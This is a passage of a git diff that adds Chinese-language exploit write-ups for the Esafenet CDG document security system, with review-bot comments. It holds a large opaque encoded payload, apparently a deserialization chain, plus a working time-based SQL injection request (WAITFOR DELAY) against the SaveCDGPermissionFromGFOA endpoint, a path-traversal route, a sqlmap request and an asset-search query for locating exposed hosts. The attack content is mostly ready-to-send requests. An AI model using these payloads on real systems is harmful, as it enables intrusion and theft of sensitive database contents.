JAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBD
JJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHI
GOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJK
BLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJL
LMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNM
EEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJL
HMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706613728037-289b604a-77c3-4235-9670-4985c533780e.png](./img/_yjz0d-97miWet3n/1706613728037-289b604a-77c3-4235-9670-4985c533780e-606978.png) + + + +> 更新: 2024-04-20 22:01:31 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vvt7bcrmmulalp3n> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞.md new file mode 100644 index 0000000..fd47e29 --- /dev/null 
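Review bot: the payload in this hunk is the same 14756-byte blob as in the PrintAuditService entry (same `NNLINELBIIKEOG...` start, same `...FBFPFBDNEJCNPK` end, same `Content-Length: 14756`), with only the request path and the Host header changed; keeping two full copies of a 14 KB opaque payload in separate Markdown files means a regenerated chain or a fix must be applied twice, so store the payload once (a shared file, or the yaml attachment style the PolicyAjax entry uses) and reference it from both write-ups, with the same note on encoding and gadget chain that this blob currently lacks. The Host header is `192.168.31.208:8090` here and `192.168.110.187:8090` in the sibling entry; both are lab addresses and should be a placeholder.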
+++ b/亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞.md 
@@ -0,0 +1,53 @@ +# 亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/nUy0RX7OgSGybkW4/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-800753.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Length: 39 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +fileId=1';WAITFOR DELAY '0:0:5'--&pis=1 +``` + +![1708236677491-71b76e2c-2bde-40b9-b677-5cad1b163cd6.png](./img/nUy0RX7OgSGybkW4/1708236677491-71b76e2c-2bde-40b9-b677-5cad1b163cd6-852730.png) + +sqlmap + +```plain +POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Length: 15 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +fileId=1&pis=1 +``` + 
+![1708236708494-e4cac02c-8d40-418a-9fa7-37add9d9b0d8.png](./img/nUy0RX7OgSGybkW4/1708236708494-e4cac02c-8d40-418a-9fa7-37add9d9b0d8-483755.png) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ftiyy7n8ys975zao> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统SecureUsbConnection存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统SecureUsbConnection存在xstream反序列化漏洞.md new file mode 100644 index 0000000..c949b2a --- /dev/null +++ b/亿赛通电子文档安全管理系统SecureUsbConnection存在xstream反序列化漏洞.md 
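Review bot: the second request's `Content-Length: 15` does not match its body, `fileId=1&pis=1` is 14 bytes, whereas the first request's `Content-Length: 39` is correct for `fileId=1';WAITFOR DELAY '0:0:5'--&pis=1`; fix the value or drop the header and let the client compute it, because a replayed request with the wrong length will hang or be rejected before the injection is ever tested. Two things the write-up should also state: why the path is `/CDGServer3/js/../SaveCDGPermissionFromGFOA` rather than `/CDGServer3/SaveCDGPermissionFromGFOA` (if the `/js/../` segment is what makes the servlet reachable without a session, say so; if it is not needed, remove it), and how the reader confirms the result, i.e. that the response arrives roughly 5 seconds later than a baseline request with `fileId=1`. The "sqlmap" part gives only a raw request and no command line; add the invocation (for example `sqlmap -r request.txt -p fileId --batch`) so the injection point is explicit.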
